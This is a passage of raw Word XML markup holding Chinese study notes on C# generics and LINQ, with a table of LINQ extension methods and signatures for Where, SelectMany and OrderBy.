        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>抗变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：抗变类型用in参数标注，泛型接口就是抗变的，支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>强制转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以将T作为输入参数，不能将T设置为返回值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型方法：除了定义泛型类之外，还可以定义泛型方法，在方法声明中可以定义泛型类。泛型方法可以在非泛型类中定义。</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Linq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概念：语言集成查询(Language Integrated Query,Linq)在C#中集成了查询语法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>可以用相同的语法访问不同的数据源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。Linq提供了不同数据源的抽象层，所以可以使用相同的语法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是所有的查询都可以用Linq查询语法完成。也不是所有的拓展方法都映射到Linq查询子句上。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>高级查询需要使用拓展方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linq有两种语法风格：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>查询语法(Query Syntax)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，这种语法格式类似于SQL查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>点语法(Dot-nontation Syntax)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，这种语法是基于拓展方法的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“查询语法”的格式：查询表达式必须以from开头，以select或group结束。在这两个子句中间可以使用where，orderby，join，let和其他from子句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linq有的方法有延迟的特性，这个特性的效果是直到对结果进行遍历，才会执行该查询。</w:t>
      </w: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6"/>
        <w:gridCol w:w="7807"/>
        <w:gridCol w:w="7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拓展方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>延迟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All</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果数据源的所有条目都与谓词匹配，则返回true</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Any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果数据源至少有一个条目与谓词匹配，则返回true</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Contains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果数据源包含指定的条目或值，返回true</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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回数据源的条目数</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First</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回数据源的第一个条目</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FirstOrDefault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回数据源的第一个条目，或无条目时，返回默认值</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Last</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回数据源最后一个条目</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LastOrDefault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回数据源最后一个条目，或无条目时，返回默认值</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Max或Min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回由Lamdba表达式表示的最大值或最小值</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OrderBy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OrderByDesceding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于Lambda表示式返回值对数据源进行排序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>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Reverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>反转数据源中数据项的顺序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>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Select</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设计一个查询结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>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SelectMany</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>把每个数据项投射到一个条目序列中，然后把所有的这些结果序列连接成一个序列</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>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Single</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回数据源第一个条目，或者有多个匹配时抛出异常</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SingleOrDefault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回数据源第一个条目，或无条目时，返回默认值；有多个条目匹配时，抛出一个异常</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Skip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SkipWhile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>跳过指定数目的元素，或者当谓词匹配时跳过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>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Sum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对谓词选定的词求和</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Take</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>TakeWhile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从数据源的开始处选择指定数目的元素，或当谓词匹配时选择条目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>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ToArray</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ToDictionary</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ToList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>把数据源转成数组，字典，列表</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Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤数据源中与谓词不匹配的条目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内连接用join子句合并两个数据源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>左外连接用join子句和DefaultIfEmpty方法定义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Where()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Where&lt;TSource&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, int, bool&gt; predicate);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该方法的委托参数第一个参数TSource表示数据源(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即调用它的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)，第二个参数是索引序列，返回值为bool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Where&lt;TSource&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, bool&gt; predicate);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该方法的委托参数第一个参数TSource表示数据源，返回值为bool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SelectMany()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SelectMany&lt;TSource,TResult&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, IEnumerable&lt;TResult&gt;&gt; selector);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该方法的委托参数第一个参数TSource表示数据源，返回值为合并后的集合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SelectMany&lt;TSource, TCollection, TResult&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, IEnumerable&lt;TCollection&gt;&gt; collectionSelector, Func&lt;TSource, TCollection, TResult&gt; resultSelector);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minor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pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OrderBy() OrderByDescending() ThenBy() ThenByDesceding()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OrderBy&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="2B91AF"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TSource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="2B91AF"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> IEnumerable&lt;TSource&gt; source, Func&lt;TSource, TKey&gt; keySelector);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
